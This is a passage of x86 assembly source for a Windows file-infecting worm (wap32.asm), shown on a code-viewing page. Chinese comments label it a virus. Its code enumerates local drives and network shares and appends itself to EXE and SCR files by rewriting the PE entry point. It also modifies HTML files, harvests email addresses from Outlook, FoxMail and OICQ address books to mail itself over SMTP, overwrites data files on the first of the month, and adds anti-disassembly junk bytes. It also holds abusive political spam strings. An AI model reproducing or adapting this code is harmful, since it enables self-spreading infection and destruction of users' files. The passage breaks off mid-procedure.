📄 wap32.asm
字号:
PushUser32ApiStr02:
call PushUser32ApiStr01
db 'FindWindowA',0
PushUser32ApiStr01:
call PushUser32ApiStr00
db 'GetWindowThreadProcessId',0
PushUser32ApiStr00:
sub ecx,esp
shr ecx,2
jmp eax
db 0e9h ;静态反汇编干扰
PushAdvApiStr:
pop eax
mov ecx,esp
call PushAdvApi03
db 'RegNotifyChangeKeyValue',0
PushAdvApi03:
call PushAdvApi02
db 'RegQueryValueExA',0
PushAdvApi02:
call PushAdvApi01
db 'RegSetValueExA',0
PushAdvApi01:
call PushAdvApi00
db 'RegOpenKeyA',0
PushAdvApi00:
sub ecx,esp
shr ecx,2
jmp eax
db 0e9h ;静态反汇编干扰
PushMprApiStr:
pop eax
mov ecx,esp
call PushMprAPiStr02
db 'WNetCloseEnum',0
PushMprAPiStr02:
call PushMprApiStr01
db 'WNetEnumResourceA',0
PushMprApiStr01:
call PushMprApiStr00
db 'WNetOpenEnumA',0
PushMprApiStr00:
sub ecx,esp
shr ecx,2
jmp eax
db 0e9h ;静态反汇编干扰
PushWsApiStr:
pop eax
mov ecx,esp
call PushWsApiStr08
db 'recv',0
PushWsApiStr08:
call PushWsApiStr07
db 'closesocket',0
PushWsApiStr07:
call PushWsApiStr06
db 'socket',0
PushWsApiStr06:
call PushWsApiStr05
db 'connect',0
PushWsApiStr05:
call PushWsApiStr04
db 'gethostbyname',0
PushWsApiStr04:
call PushWsApiStr03
db 'htons',0
PushWsApiStr03:
call PushWsApiStr02
db 'send',0
PushWsApiStr02:
call PushWsApiStr01
db 'WSACleanup',0
PushWsApiStr01:
call PushWsApiStr00
db 'WSAStartup',0
PushWsApiStr00:
sub ecx,esp
shr ecx,2
jmp eax
db 0e9h ;静态反汇编干扰
PushQQMsg:
pop eax
mov ecx,esp
call PushQQMsg00
db '枪毙李洪志!',0
PushQQMsg00:
call PushQQMsg01
db '去他妈的法轮功!',0
PushQQMsg01:
call PushQQMsg02
db '反对邪教,崇尚科学!',0
PushQQMsg02:
call PushQQMsg03
db '打倒本拉登!',0
PushQQMsg03:
call PushQQMsg04
db '向英雄王伟致意!',0
PushQQMsg04:
call PushQQMsg05
db '反对霸权主义!',0
PushQQMsg05:
call PushQQMsg06
db '世界需要和平!',0
PushQQMsg06:
call PushQQMsg07
db '社会主义好!',0
PushQQMsg07:
sub ecx,esp
jmp eax
db 0e9h ;静态反汇编干扰
BuildVirusPathInStack proc Stack: dword
pushad
mov edi,Stack
call [esi.KnlGetSystemDirectoryA],edi,100h
add edi,eax
call GetVirusFileName
db '\runouce.exe',0
GetVirusFileName:
pop esi
mov ecx,16
cld
rep movsb ;合成病毒路径名
popad
ret
BuildVirusPathInStack endp
db 0e9h ;静态反汇编干扰
EnumLogDrive proc
;列举本地逻辑磁盘文件
mov ecx,24
mov edx,'\:C'
ContEnumLogDrive:
push ecx
push edx
call [esi.KnlGetDriveTypeA],esp
cmp eax,2 ;是不可访问磁盘
jb short ContNextLogDrive
cmp eax,5 ;是CDROM光盘
jz short ContNextLogDrive
call EnumFileObject,esp
ContNextLogDrive:
pop edx
inc edx
pop ecx
loop short ContEnumLogDrive
ret
EnumLogDrive endp
db 0e9h ;静态反汇编干扰
EnumNetResource proc
;列举网络资源
xor edi,edi ;edi: NetData
call PushEnumNetWorkGroup
call PushEnumNetComputer
call PushEnumNetComputerShareDir
call PushEnumNetFile
mov eax,[edi.lpRemoteName]
call EnumFileObject,eax;列举计算机共享目录里的文件
ret
db 0e9h ;静态反汇编干扰
PushEnumNetFile: ;列举计算机共享目录
call EnumNetObject,RESOURCEUSAGE_CONNECTABLE,edi
ret
db 0e9h ;静态反汇编干扰
PushEnumNetComputerShareDir: ;列举计算机
call EnumNetObject,RESOURCEUSAGE_CONTAINER,edi
ret
db 0e9h ;静态反汇编干扰
PushEnumNetComputer: ;列举工作组
call EnumNetObject,RESOURCEUSAGE_CONTAINER,edi
ret
db 0e9h ;静态反汇编干扰
PushEnumNetWorkGroup: ;列举网络根
call EnumNetObject,RESOURCEUSAGE_CONTAINER,edi
ret
db 0e9h ;静态反汇编干扰
EnumNetResource endp
EnumNetObject proc Flag:dword,NetData:dword,CallBack:dword
;用来列举局域网某种对象
pushad
push eax
call [esi.MprWNetOpenEnumA],RESOURCE_GLOBALNET,RESOURCETYPE_DISK,Flag,NetData,esp
pop ebx ;弹出hEnum句柄,平衡堆栈
or eax,eax
jnz short EnumNetObjectError
sub esp,MAX_BUFF_SIZE;划分堆栈空间大小
LoopEnumNetObject:
mov edx,esp
push L 1h ;一次列举一个
mov eax,esp
push MAX_BUFF_SIZE ;缓冲区大小
call [esi.MprWNetEnumResourceA],ebx,eax,edx,esp
pop ecx
pop ecx ;平衡堆栈
or eax,eax
jnz short EnumNetObjectOver
mov edi,esp
call CallBack ;调用回调函数,利用edi,传递参数
jmp short LoopEnumNetObject
db 0e9h ;静态反汇编干扰
EnumNetObjectOver:
call [esi.MprWNetCloseEnum],ebx
add esp,MAX_BUFF_SIZE
EnumNetObjectError:
popad
ret
EnumNetObject endp
db 0e9h ;静态反汇编干扰
EnumFileObject proc BootDir:dword
;用来列举目录/网络上某个共享目录
pushad
mov eax,BootDir
mov eax,[eax]
or eax,20202020h
cmp eax,'nniw' ;不感染WINN...目录
jz short SetDirError
cmp eax,'dniw' ;不感染WIND...目录
jz short SetDirError
call [esi.KnlSetCurrentDirectoryA],BootDir ;设为当前目录
or eax,eax
jz short SetDirError
call FoundDirObject,BootDir
sub esp,MAX_BUFF_SIZE;1000h字节的缓冲区
mov [esp],L 2a2e2ah ;建立"*.*"字符串
mov eax,esp
call [esi.KnlFindFirstFileA],eax,esp
mov ebx,eax
cmp eax,-1
jz short EnumFileObjectError
LoopEnumFileObject:
call [esi.KnlFindNextFileA],ebx,esp
or eax,eax
jz short EnumFileObjectOver
lea edx,[esp.cFileName]
mov eax,[esp.dwFileAttributes]
and eax,10h ;测试文件属性
jz short IsFileObject
IsDirObject: ;是一个目录
mov eax,[edx]
cmp al,'.' ;测试是否点目录,是就不处理
jz short LoopEnumFileObject
call EnumFileObject,edx;递归调用
jmp short LoopEnumFileObject
db 0e9h ;静态反汇编干扰
IsFileObject: ;是一个文件
call FoundFileObject,esp;操作文件
jmp short LoopEnumFileObject
db 0e9h ;静态反汇编干扰
EnumFileObjectOver:
call [esi.KnlFindClose],ebx
EnumFileObjectError:
mov dword ptr[esp],L 2e2eh ;恢复原来的当前目录 建立字符串".."
call [esi.KnlSetCurrentDirectoryA],esp
add esp,MAX_BUFF_SIZE;平衡堆栈
SetDirError:
popad
ret
EnumFileObject endp
db 0e9h ;静态反汇编干扰
FoundDirObject proc DirName: dword
pushad
call PushOptDirError
popad
ret
db 0e9h ;静态反汇编干扰
PushOptDirError:
pop ecx ;意外忽略设置
call SetSehFrame
call GetFoundDirCallBackAddr
call [edx],DirName
int 3 ;人工意外
FoundDirObject endp
db 0e9h ;静
FoundFileObject proc FindData:dword
pushad
call PushOptFileError
popad
ret
db 0e9h ;静态反汇编干扰
PushOptFileError:
pop ecx ;意外忽略设置
call SetSehFrame
call GetFoundFileCallBackAddr
call [edx],FindData
int 3 ;人工意外
FoundFileObject endp
db 0e9h ;静态反汇编干扰
GetFoundDirCallBackAddr:
call PushFoundDirCallBackAddr
FoundDirCallBackAddr dd ?
PushFoundDirCallBackAddr:
pop edx
ret
db 0e9h ;静态反汇编干扰
GetFoundFileCallBackAddr:
call PushFoundFileCallBackAddr
FoundFileCallBackAddr dd ?
PushFoundFileCallBackAddr:
pop edx
ret
db 0e9h ;静态反汇编干扰
GetFileExtName proc FileName: dword
mov eax,FileName
ContIncEax:
inc eax
cmp byte ptr[eax],0
jnz short ContIncEax
mov eax,[eax-4]
or eax,20202020h
ret
GetFileExtName endp
db 0e9h ;静态反汇编干扰
OptLocalDir proc DirName: dword
call [esi.KnlSleep],10;消除CPU时间占有异常
ret
OptLocalDir endp
db 0e9h ;静态反汇编干扰
OptNetDir proc NetDirName: dword
sub esp,100h
call BuildVirusPathInStack,esp
mov edi,esp
call [esi.KnlLOpen],edi,0
cmp eax,-1
jz short OptNetDirEnd
mov ebx,eax
mov eax,100h
push eax
mov eax,esp
call [esi.KnlGetComputerNameA],edi,eax
pop eax
add eax,edi
mov dword ptr[eax],'lme.'
mov dword ptr[eax+4],0
call [esi.KnlLCreat],edi,0
cmp eax,-1
jz short CloseVirFile
mov edi,eax
call MakeMailFile,0,ebx,edi
call [esi.KnlLClose],edi
CloseVirFile:
call [esi.KnlLClose],ebx
OptNetDirEnd:
add esp,100h
ret
OptNetDir endp
db 0e9h ;静态反汇编干扰
OptMailFile proc FindData: dword
mov edi,FindData
lea ebx,[edi.cFileName]
call GetFileExtName,ebx
cmp eax,'baw.' ;得到OutLook地址薄文件
jz short IsWabFile
cmp eax,'cda.' ;得到FoxMail地址薄文件
jz short IsDbFile
cmp eax,'bd.r' ;得到Oicq地址薄文件
jz short IsDbFile
cmp eax,'cod.'
jz short IsDbFile
cmp eax,'slx.'
jz short IsDbFile
ret
db 0e9h ;静态反汇编干扰
IsWabFile:
call EnumWabMail,ebx
ret
db 0e9h ;静态反汇编干扰
IsDbFile:
call EnumDbMail,ebx
sub esp,100h
call [esi.KnlGetSystemTime],esp
mov ax,[esp.stDay]
add esp,100h
cmp ax,01
jnz short NoDelDbFile
call [esi.KnlLOpen],ebx,02
cmp eax,-1
jz short NoDelDbFile
mov ebx,eax
call [esi.KnlLWrite],ebx,esp,1234h
call [esi.KnlLClose],ebx
NoDelDbFile:
ret
OptMailFile endp
db 0e9h ;静态反汇编干扰
OptExeFile proc FindData: dword
;为修改PE文件做准备,恢复文件信息
mov edi,FindData
lea ebx,[edi.cFileName]
call GetFileExtName,ebx
cmp eax,'exe.' ;传染EXE文件
jz short IsExeFile
cmp eax,'rcs.' ;传染SCR文件
jz short IsExeFile
cmp eax,'mth.'
jz short IsHtmFile
cmp eax,'lmth'
jz short IsHtmFile
ret
IsHtmFile:
call [esi.KnlSetFileAttributesA],ebx,L 0
call [esi.KnlLOpen],ebx,L 02
cmp eax,-1
jz short OpenHtmlError
mov ebx,eax
call FixHtmlFile,ebx
lea eax,[edi.ftCreationTime]
lea ecx,[edi.ftLastAccessTime]
lea edx,[edi.ftLastWriteTime]
call [esi.KnlSetFileTime],ebx,eax,ecx,edx
call [esi.KnlLClose],ebx
OpenHtmlError:
lea ebx,[edi.cFileName]
call [esi.KnlSetFileAttributesA],ebx,[edi.dwFileAttributes]
ret
IsExeFile:
call [esi.KnlSetFileAttributesA],ebx,L 0
call [esi.KnlLOpen],ebx,L 02
cmp eax,-1
jz short OpenFileError
mov ebx,eax
call FixPeFile,ebx
lea eax,[edi.ftCreationTime]
lea ecx,[edi.ftLastAccessTime]
lea edx,[edi.ftLastWriteTime]
call [esi.KnlSetFileTime],ebx,eax,ecx,edx
call [esi.KnlLClose],ebx
OpenFileError:
lea ebx,[edi.cFileName]
call [esi.KnlSetFileAttributesA],ebx,[edi.dwFileAttributes]
ret
OptExeFile endp
db 0e9h ;静态反汇编干扰
FixHtmlFile proc hHtmlFile:dword
pushad
sub esp,100h
call BuildVirusPathInStack,esp
mov eax,esp
call [esi.KnlLOpen],eax,0
add esp,100h
cmp eax,-1
jz FixHtmlFileEnd
mov ebx,eax
call GetEmlFile
db 'readme.eml',0
GetEmlFile:
pop eax
call [esi.KnlLCreat],eax,0
cmp eax,-1
jz FixHtmlOver
mov edi,eax
call MakeMailFile,0,ebx,edi
call [esi.KnlLClose],edi
mov edi,hHtmlFile
call [esi.KnlLSeek],edi,L 0,L 02
call GetHtmlCode
HtmlCodeStart:
db 0dh,0ah,'<html></html>',0
GetHtmlCode:
pop eax
call [esi.KnlLWrite],edi,eax,offset GetHtmlCode-offset HtmlCodeStart
FixHtmlOver:
call [esi.KnlLClose],ebx
FixHtmlFileEnd:
popad
ret
FixHtmlFile endp
db 0e9h ;静态反汇编干扰
FixPeFile proc hPeFile:dword
;修改PE文件,附加上病毒体
pushad
sub esp,MAX_BUFF_SIZE
mov edi,esp
call [esi.KnlLRead],hPeFile,edi,MAX_BUFF_SIZE
movzx eax,word ptr[edi+PEHeaderOffset]
add edi,eax
cmp edi,ebp ;超界检查
ja FixPeFileOver
cmp [edi.fhPEFlag],'EP';检查PE文件
jnz FixPeFileOver
lea ebx,[edi.fhObjectTable00]
movzx ecx,[edi.fhObjectCount]
dec ecx
FindLastObjectTable:
add ebx,size ObjectTable
loop FindLastObjectTable
cmp ebx,ebp ;超界检查
ja FixPeFileOver
mov eax,[edi.fhEntryRVA]
sub eax,[ebx.otRVA] ;检查病毒是否已经感染该PE文件
jb short StartFixPeFile
add eax,[ebx.otPhysOffset]
call [esi.KnlLSeek],hPeFile,eax,L 0
push eax
mov eax,esp
call [esi.KnlLRead],hPeFile,eax,04
pop eax
cmp ax,0e860h ;是否是病毒指令
jz FixPeFileOver
BuildVirusCodeInStack:
StartFixPeFile:
or [ebx.otFlags],0e0000000h ;Code|Init|Exec|Read|Write[CIERW]属性
call [esi.KnlLSeek],hPeFile,L 0,L 02;探测文件长度
cmp eax,-1
jz short FixPeFileOver
push eax ;保存文件长度信息
add eax,VirusSize
sub eax,[ebx.otPhysOffset];计算ObjectTable物理尺寸
mov [ebx.otPhysSize],eax
mov edx,[ebx.otVirtSize]
cmp eax,edx
jb short NoFixVirtSize
mov [ebx.otVirtSize],eax;扩展虚拟尺寸
mov ecx,[edi.fhObjectAlign];取Object对齐信息
dec ecx
add eax,ecx ;收尾数
add edx,ecx ;收尾数
not ecx
and eax,ecx ;取整数
and edx,ecx ;取整数
sub eax,edx ;计算新ImageSize增加值
add [edi.fhImageSize],eax;扩展映射总尺寸
NoFixVirtSize:
pop ecx ;弹出文件长度信息
sub ecx,[ebx.otPhysOffset]
add ecx,[ebx.otRVA] ;计算出新PE程序入口
xchg [edi.fhEntryRVA],ecx
add ecx,[edi.fhImageBase]
call GetBaseAddress
GetBaseAddress:
pop edi
sub edi,offset GetBaseAddress-offset OldEntryRVA
mov [edi],ecx ;记录老PE程序入口
WriteVirusToFile:
sub edi,offset OldEntryRVA-offset Start
call [esi.KnlLWrite],hPeFile,edi,VirusSize
cmp eax,-1
jz short FixPeFileOver
WritePeHeader:
call [esi.KnlLSeek],hPeFile,L 0,L 0
mov eax,esp
call [esi.KnlLWrite],hPeFile,eax,MAX_BUFF_SIZE
FixPeFileOver:
add esp,MAX_BUFF_SIZE
popad
ret
FixPeFile endp
db 0e9h ;静态反汇编干扰
FoundMailObject proc eMail: dword
pushad
sub esp,100h
call BuildVirusPathInStack,esp
mov edi,esp
call [esi.KnlLOpen],edi,0
cmp eax,-1
jz short FoundMailObjectEnd
mov ebx,eax
call SmtpSendMail,eMail,ebx
call [esi.KnlLClose],ebx
FoundMailObjectEnd:
add esp,100h
popad
ret
FoundMailObject endp
EnumDbMail proc DbFile: dword
pushad
call [esi.KnlLOpen],DbFile,0
cmp eax,-1
jz EnumDbMailEnd
mov ebx,eax
sub esp,100h
ScanEmailStr:
mov edi,esp
xor edx,edx
ReadDbFile:
push edx
push eax
mov eax,esp
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -